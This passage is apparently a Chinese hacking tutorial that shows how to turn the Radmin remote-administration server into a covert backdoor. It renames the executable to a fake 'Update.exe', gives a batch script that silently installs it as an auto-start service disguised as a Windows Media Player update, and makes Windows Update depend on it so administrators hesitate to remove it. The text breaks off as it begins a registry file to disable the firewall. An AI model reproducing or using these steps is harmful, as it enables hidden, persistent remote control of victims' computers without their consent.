制作过程
首先自己安装一下Radmin服务端,配置完密码,端口等信息后导出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件,这里我另存为名Server.reg。然后要修改R_server.exe的图标并修改文件名为迷惑性文字如Update.exe,修改图标我用IcoSprite,觉得还不错。这样假如对方装有天网之类防火墙的话,可以骗过一些菜鸟,同意允许对外连接。
接下来我们制作核心部分,最关键的BAT,重要的我将简单解释:
@echo off
@sc stop r_server
‘假如已经被装过R_server服务,先用SC将它停掉。
@sc delete r_server
‘将已经装过R_server服务删除。
@regedit /s server.reg
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= own type= interact start= auto DisplayName= "Media Player of Remote
Control Driver Update"
‘这句是用SC建立一个服务,服务名为Mpservice,路径Binpath为"%systemroot%\system32\drivers\Update.exe /service",类型type为 own 与interact交互,启动类型start为 自动,显示名DisplayName为"Media Player of Remote Control Driver Update"。
@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。"
‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、库提供基层更新安全补丁的服务。”
@sc config wuauserv depend= MPservice
‘配置MPservice使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update 网站的自动更新服务)。这里的目的是迷惑管理员,使其不敢轻易停止我们生成的Radmin服务。
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32\drivers\DisFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\